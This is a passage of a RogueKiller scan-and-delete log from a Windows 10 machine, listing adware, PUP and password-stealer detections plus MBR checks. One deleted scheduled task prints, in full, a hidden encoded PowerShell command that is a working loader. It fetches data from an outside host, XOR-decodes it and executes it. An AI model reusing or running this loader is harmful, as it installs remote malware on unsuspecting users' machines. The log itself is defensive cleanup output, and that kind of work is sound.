AHoANABNADQAeABGADEAVwB2AGMAegBOAGEAaQAzAE0ASwB2AHkAeQAwAGMAZwBRADkAXwAzADQAWgBpAEwAcABPAF8AWgBhAGoARgB0AFIAegA0ADgAeQBSADEAdQBsAHQAcgBuAHkAdgBuAGkAcQBQAFYAeQBBAFoAdgBwADgANgBPAEMAUgBPADkANwBnAEQATAB1AEEARwB4AG0AdgBtAGcAMQB1AHEAWABnAHkAeABhADUANgAmAHIAPQA1ADcAMQA4ADAAMAA2ADAANQA4ADQAMgA2ADUANQA0ADQANAA2ACIAOwAkAHMAdABzAGsAPQAiAHsAMABEADAANQAwAEEANAA3AC0AMAA0ADAANAAtADAAQwAwAEIALQA3AEUAMQAxAC0ANwA4ADAANQA3AEUANwBEADEAMQA3AEQAfQAiADsAJABwAHIAaQBkAD0AIgBPAG4AZQBTAHkAcwB0AGUAbQBDAGEAcgBlACIAOwAkAGkAbgBpAGQAPQAiAE0AVwBaAFEAWAAxAE8AWAAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwAKAH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAOwB9ADsAfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AAoAfQAKAGYAdQBuAGMAdABpAG8AbgAgAFUAVwBKAEYAVABNAEoARABIAEQASwBYAF8ASQBaAEIAQQBCACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwAKAH0ACgBmAHUAbgBjAHQAaQBvAG4AIABGAFgASQBTAEkAUABHAE4AQwAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwAKAH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0ARgBYAEkAUwBJAFAARwBOAEMAKABVAFcASgBGAFQATQBKAEQASABEAEsAWABfAEkAWgBCAEEAQgAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7ACAAfQA7AGUAeABpAHQAIAAwADsA) -> Found
 
¤¤¤ Files : 4 ¤¤¤
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData -> Found
[PUP.Amonetize][File] C:\Users\Jpoch\AppData\Local\Temp\dd-37146-936-f9988-201d17ce4a2e4\ADVOFKIWWU.exe -> Found
[Pwd.Stealer][File] C:\Program Files (x86)\Google\Chrome\Application\winhttp.dll -> Found
[PUP.YahooPowered][File] C:\Users\Jpoch\AppData\Roaming\Mozilla\Firefox\Profiles\eggor1db.default\searchplugins\YAHOO! POWERED SEARCH.XML -> Found
 
¤¤¤ WMI : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD10EZEX-60M2NA0 +++++
--- User ---
[MBR] ddaa32bb8d2d1edee03613fab80d2fe3
[BSP] a07e8b3550ee83d9c7c223cf1cd7f92c : Windows Vista/7/8 MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 953867 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK
 
+++++ PhysicalDrive1: ADATA SP610 +++++
--- User ---
[MBR] 2bf09fd3323152756de5db48f7a40a8e
[BSP] 79622432022f49b832f926bf0763e6dd : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 350 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 718848 | Size: 121302 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 249145344 | Size: 450 MB
User = LL1 ... OK
User = LL2 ... OK
 
Delete #2
 
RogueKiller V12.11.25.0 (x64) [Nov 20 2017] (Free) by Adlice Software
 
Operating System : Windows 10 (10.0.15063) 64 bits version
Started in : Normal mode
User : Jpoch [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Delete -- Date : 11/20/2017 23:51:38 (Duration : 00:18:37)
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 4 ¤¤¤
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\CSASTATS -> Deleted
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\PRODUCTSETUP -> Deleted
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\CSASTATS -> Deleted
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\PRODUCTSETUP -> Deleted
 
¤¤¤ Tasks : 7 ¤¤¤
[VT.Detected] \OPTIMIZE START MENU CACHE FILES-S-AK -- C:\Users\Jpoch\AppData\Local\9473901e0c7844098f532bfef236bee4\chipset.exe exec hide XPICSBNYDO.cmd -> Deleted
[VT.Detected] \OPTIMIZE START MENU CACHE FILES-S-IJ -- C:\Users\Jpoch\AppData\Local\afeada034889495fb73c9f8c3f354641\chipset.exe exec hide XZOQWMCMVN.cmd -> Deleted
[Suspicious.Path] \OPTIMIZE START MENU CACHE FILES-S-LR -- C:\ProgramData\6e6cc0af64b54b7891a16a888cd366e7\chipset.exe exec hide JPRLEYTJHS.cmd -> Deleted
[Suspicious.Path] \OPTIMIZE START MENU CACHE FILES-S-YT -- C:\ProgramData\3c405015f0eb4fae8b5f3139c2328bd8\chipset.exe exec hide QPEZNPALYH.cmd -> Deleted
[Adw.Optimizer] \SPACE(TITLE, T_DELAYED) -- "C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe" (-scan) -> Deleted
[Adw.Optimizer] \SPACE(TITLE, T_MONITOR) -- "C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe" (-Notify) -> Deleted
[Mal.Powershell] \{0D050A47-0404-0C0B-7E11-78057E7D117D} -- C:\WINDOWS\system32\WindowsPowershell\v1.0\powershell.exe (-nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABQAFUAWABWAF8ASQBaAE8AWABPAEEAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAIAB9AHQAcgB5AHsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQAcAAgAC0ATgBhAG0AZQAgACQAbgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAOwB9AAoAYwBhAHQAYwBoAHsAdAByAHkAewBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABwACAALQBOAGEAbQBlACAAJABuACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAIAB9ADsAfQAKAH0AUABVAFgAVgBfAEkAWgBPAFgATwBBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXwB2ADEALgAwAF8AcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIAKQA7AFAAVQBYAFYAXwBJAFoATwBYAE8AQQAoACIASABLAEMAVQA6AFwAQwBvAG4AcwBvAGwAZQBcACUAUwB5AHMAdABlAG0AUgBvAG8AdAAlAF8AUwB5AHMAdABlAG0AMwAyAF8AcwB2AGMAaABvAHMAdAAuAGUAeABlACIAKQA7AFAAVQBYAFYAXwBJAFoATwBYAE8AQQAoACIASABLAEMAVQA6AFwAQwBvAG4AcwBvAGwAZQBcAHQAYQBzAGsAZQBuAGcALgBlAHgAZQAiACkAOwAKACQAcwB1AHIAbAA9ACIAaAB0AHQAcAA6AC8ALwB0AGEAYgBsAGUAegBpAHAALgBpAG4AZgBvAC8AdQAvAD8AYQA9AHcAaQA0AEMANAB3ADIASgB2ADAAUgBZAFQALQB5AEUAeQA2AEUAQgBvAGUAMgBkAEwARwBiADAAMwBHAFcAZABwAFkANwBlAC0AbwA0AFAAWQBfAGwAZABKAGsAbwBCADMAUgBVAGgATAB3AE8AXwByAC0ASgB4AGMAegBzADkAZQBhAGsALQBMAG0AOABBAGoAVABOAHoARABLADMAcQBSAG4AaQBHADYAMQBkAGQAdQA2ADAAcwBSAGQARgB3AEYAYQBkAFUAOAA3AFoAOQA4AGkAMwBZAEUATwBvAGQAWQB4ADQAbABmAGIAVgB4ADYAUAA3AHAAdABMAFcARAAxAHQANgBqADIAUwBKAFEAUQBHAHMAVwBIAHoAQwBoAHMAcgBrAHAAcQBzAGcAWQA3AFQAUwA1AFoAawA4AGMAWgBNAEcAbwB0AE0AMQA4AEkANABIAGoAcABIAEwAYgBoAGIASgBSAGYAOQA4AEQAOQA5AHAARwA3AEIAWgBYAGsAZwB5AGcALQBQAGcAcAAyAEUASwBwADMAUQBWAGUAMwBDAEgAeABjAFQAbABxAFQAUgBrAFoAOQA4AEwAegBTADIAZgByAFUAawBTAGUAZABPADIARwBSAHgAWQA0AGwAYQBQAEQAdABFAFIAWgBpAHMAcAB2AEMAQgBBAEkAOABGAEIAUABCAEkANwA0AGwAbgA2AGoATgBZADgAcABZAFEATQBaAE8AdwBMAEQAMgBhAHgAZABYAEYAWgBVAE8AUABHAFUATwBtAFgANwBxAHQAeABkAGUAQgBHAHoAQQA1AGIAbwBLAFcARgBaAFQAbABwAE4ARgA0AGMAegBVADIAUQBEAEwAZgBUAFMAZAAyAFIAQgBTADYAWgBPAGMAagAwAE4AUgBzAGUANgBpAE0AawByADIARQBwAEoAbQBNAFoAOAAtAGoAdABOAHgANQAzAEgAUQBFAEcAagBCAFMAcgBpADUAVwA5AHMAQgBZADgAUAB3AGIANQAyADMAawBlAGMANgB0AEoANABlAEoAdwBqAE8AVAAyADAAZABCAEkAZABzAEQAcAB4AHcATABlAFMAMQBtADAAcgBkAGYANgBYAFkAMgBLAG4AVABCAEMATwAwADQATQAtAC0AYQAwAHAAUABJAGIAMwA0AG0AcABsADEAQgBvAGkAZwBUADMARgA3AGwAbwBzADcANQBmAGEAQwBRAHQARwBmADYAUABrAGgAMgB5AHMAMwBiAGQASQBzADIATwAyADUAVwA0AGEAVABQAFgAMQBzAE4AUgBlADAAcQAxAHcAdwB1ADgAcAA3AC0ARQBxAG8ARgBXAEYAVQBNADgAcwBFAEwAeABtADEAMQBPAHoAZwBDADYASQBQAEYAOABPAFgAVQBuAGYARQAzAHkAZgBlAFkAMwAwAG8AdABmAEoASgBVAE0AWgBpAGQAWABYAHcASwBFAF8AMgBUAEsAQgBqAGIASQBRAEEANgAzAHcAMgBPAEMASgBRAEUAUgBBAEoAdQBnADQAaQBTAHEAZwBYADMARAAwADgAeAAxAHYAcwBWAEUAegBEAGQATgBEADQAbgBWAGgAZAAzAG4ASQBfAFQAMwB2AFoAQQBpADkASABQADUAegBxAHYAQwBoADYAWABTADQAYwBQADgARQAwAEgAUQBxAHgAMgBlAGQAOQB1AEgAOQA3AGMAQgBhAF8ASgBNAG8AQwBrAGgAdABpAEEAcABEAE8AbwBXAEQAZABhAE8AVwBWADgAUABlAGQAVwBRAFYAMwBQADgASgBYAEoAOAB6AHQAMwBJAFoANgBYADQAdQBmADcAWgBoAEkAdwBlAFUAcwB0AHQASwBhADMAMwBBAEEAYwBBAG4AcABPAGoAdwBhAFoANgBIAF8AOAA0AGYAawBzAF8ARgBvAE8AaABBAEwAOQA4AHgASgBKAEwAMwBzAHIAaABFAHAAZQBxAFcAVwBtAGUATQBRAEcAdgA1AFoAcQAwAG0AawBaAHYAWABjAGIAXwBmAEUAWABUAGEAbwAwADEAOQByAFAAagA0AGwAVQBRAEIAbABKAFUAWQA5AHUAeABjADEAbgBhAGUAaABPAGsAOABMAHUAQwB0AHAAQQBUADUAdQBXADkAcABqADEAOABtADAAYgBIAGgAcwBEAHgAUABDAEIAZQA5AGoAVQBKAE0AdQBVAEQAYgBYAEIAZAAzAE0AcgBzAFcAVABXAEcAZAB4AHcATwBaAHoAYgBvAHgAbgBfAHUANABkAE0AawBLAHoAOABPADIAbQBmAGIARAA3AEYAaQAwAFEAWgBCAEMAZQA0AFUAYwBjAEYAMgBIAEgARABTADQAeQBQADMAbABhAGoAQQBnAFYAUwBtAG0AMwBLAFcAZwBhAEEAcABEAEEANQA3ADAANgB3AFoARQBnAGYASwBCAFIAbABBAE0AMQBCAEIAYgB3AFUAZwBJAEUAUQBfAFgAegBSADQAagBoADYAUQB6AGcAUQAzAEQATABmADEANwB5AFAAMgBjADkAVgBvAFIAZwAyAG4AOABfAGkAMABaAEEAXwBkAHkAXwBwAGoAdgBEAHUALQBNAHUAcQBTAHEAeQB1AF8ARAB3AEwAOAAtAGQAOABiAGcAUABWAHUARwB4AFIAMgBlAEIAagBlAGIAVABlAHkARwBHADMAMgBUADkAUwBFAFAAQwBJAGMAdQAwAHcAdQBOAFEAQwBOAGYAOQBnAC0AJgBjAD0AcgBPAF8AYwB3ADgATQBSAEMARQBzAFMAYwBKAEQAdQBzAE0AagBzAFkALQBKAGYAbABVADgAMABiADQARQAtAHoARgA1AFoAZgBzAE8ASAAzAE8AUABrADQAZwBQAEgANwBxAHAASABjAE0AQwBCAGkAUAA1AC0ARwBnAHYAaQBBAFEATABoAHEAWQBnADEATgBVAFAARQBGAFEAUQBCAHYARgBJAGkAZQB4AEoAcgB5ADQAZgBDADUAOQBRAGUAbwBQAHMAQgBRAGIAZQBTAEMAQgBNAHUAaQBTAGsAZgBkAGwARQBxAHkAQgB0AEEAcgBuAG0AbABFADYAZAA3AEgAdgBWAGwATABQAFoAdwBiAEcAZgBCAGYANABRAEwATQAwAHIAUQB3ADUAUwBGAG8ASQBFADEASQBZAEMATABNAHgANABnAHQAcwBvAFcAZgA2AFYAWgB6AHMARgBpAE0AawBSADIAegBOAFUAcwBUADYAdABUAEEAdABmAG4ANwBYAFEAdwB5ADcAagBpAHAAOQBCAFAAdwAwADcAXwBBADYAdgBJAGwASABUAHUAcQBFAFEAawBkADUAeABrAFUAUQAtAHcAQQAwAEUARABLAEUAUwBhADkAcwAyADYAYgBUAFQAVwA4AFoAYQBqAEcAegBJAG0AUwBFADIAWQBqADEAUAA3AGkAagBqAEsAQwB1AFQAbgA0AHMAXwA3AHoANABXAEoATAA5AE8AZAB5AHEARwBvAFAAaAA0AC0ASAB1AEMAcgBsAGkAWgBpAGIANgBFADEARwAzAGYANwBvAFUAZwB3AE8ATABRADUANwBoAHoATABkAGoAcwBZAFAASAAwAGIAXwBJAGkAYwBKAFAAZABMAGsAbABmADEATgBZAGYAOQAyAC0ALQBuAEEAYwBXAFcAeAB6AC0AQQBKAHoAZABNAG0ARgB6AHYASgAtAEcAdgAzAEgAVABSADkAeQBNAGMAWQBTAHIAeQBkAEYAVQA5AGEARABYADYASgBBAGkARABaADUAbwBEAGIAXwB0AEkAbgB2AE0AUQBfAGsARQBhAEcAMwB3AHUAcQBzADEAcgBIADMAMQB0AGsARgBiAFEAOABIAF8AQwBJAEYAWABPAFIARAA4AEcANQBhADIAdQBZAFUAeQAyAHcAdwA1AFEARwBQAEMATwBfADQAZQBfAEkAZgB2AGMALQB3ADgAZABFAFUARQBDAFUAQwBJAEwAaQAxAHoANQBrADEAcABfAGwAZwBBAHAAeQBqAGMAYwBiAHoAWQBTAEEAWQBqADEAegA0ADEARQBOAF8AbwAwAHcAaQB6AE0AWgBnADgAMgBkAGcAOABBAGgAYwBBAHcARgA0AGkARwBzAF8ASgB5AEQAUwBQADEAWQBYAEgATwB3AEsAZAB6AFQAQwB6ADEAVAA2AHgAMgBOAEkAQQBMAFYASgBTAEkAbgBDAHYATgBBADYAaQBLAG8AXwBOAE4AagBhAFYAbwBsAFoAVQBPADAAVQBwAEMAbQB2AC0AMgBLAGgAUwBQAHUAMgBWAEoAOABIAEQAbgBMAG4ANABiAEIASgB3AFcAVgBpAEwAcABKAFIAVgBjAEMARABUAEoAaQBWAEgAZwBmAGIASABTAEEARABKAHIAcwBRAGoARQBnAGgAYQBQAE4AegBPADEAeQA1AHEAegBGAHEAUAB4AFkAUQBzAE4ANwBuAHEAVwBDAFgAbwBRAFYATQB4ADUAOABIADEAVwBSAE0ASQB1AGwAegBZAGEARwBHAG8AUABHAHUAWQBvAHkANQBZAG0AMQBOAG4AYQB2AEQANgBKAFgAMABnAGgAMwBJAHYAdgBZAG8AVgBnAGgATwBMADcAUQBxAEMAcwBrAEwAOQBzAEsAbwAxAFUAdwBBAE4ARgBVAHIAcABNAGwAMwAzAEwAbwBXADMAeQB0AHgAegBOAGEAQwBtAEMANABIAC0AMABrAEsAUgB3AGoARQBSAGQASABOAGkAcAAxAHAATAB1AEwASwBsADkAYwBJAG4AbQAxAFoAQwA2AEwAdAA0AGwAOABxADgAQQBMAEsATABCADEAcgAyAFoASAAzAHYAVABQAEYAQgBnADcAOABiAEQAZwBmAFAASAAwAEMAWgBDAHMARwBXAGsAMgBPAGwAMQBzAFMAQQAxAEgARgBvAHkAawBDADEAcwBUAG0ARgAwAEIAMQB6AEEAUABHADYAegBkAGgASgAwAHoANABNADQAeABGADEAVwB2AGMAegBOAGEAaQAzAE0ASwB2AHkAeQAwAGMAZwBRADkAXwAzADQAWgBpAEwAcABPAF8AWgBhAGoARgB0AFIAegA0ADgAeQBSADEAdQBsAHQAcgBuAHkAdgBuAGkAcQBQAFYAeQBBAFoAdgBwADgANgBPAEMAUgBPADkANwBnAEQATAB1AEEARwB4AG0AdgBtAGcAMQB1AHEAWABnAHkAeABhADUANgAmAHIAPQA1ADcAMQA4ADAAMAA2ADAANQA4ADQAMgA2ADUANQA0ADQANAA2ACIAOwAkAHMAdABzAGsAPQAiAHsAMABEADAANQAwAEEANAA3AC0AMAA0ADAANAAtADAAQwAwAEIALQA3AEUAMQAxAC0ANwA4ADAANQA3AEUANwBEADEAMQA3AEQAfQAiADsAJABwAHIAaQBkAD0AIgBPAG4AZQBTAHkAcwB0AGUAbQBDAGEAcgBlACIAOwAkAGkAbgBpAGQAPQAiAE0AVwBaAFEAWAAxAE8AWAAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwAKAH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAOwB9ADsAfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AAoAfQAKAGYAdQBuAGMAdABpAG8AbgAgAFUAVwBKAEYAVABNAEoARABIAEQASwBYAF8ASQBaAEIAQQBCACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwAKAH0ACgBmAHUAbgBjAHQAaQBvAG4AIABGAFgASQBTAEkAUABHAE4AQwAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwAKAH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0ARgBYAEkAUwBJAFAARwBOAEMAKABVAFcASgBGAFQATQBKAEQASABEAEsAWABfAEkAWgBCAEEAQgAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHI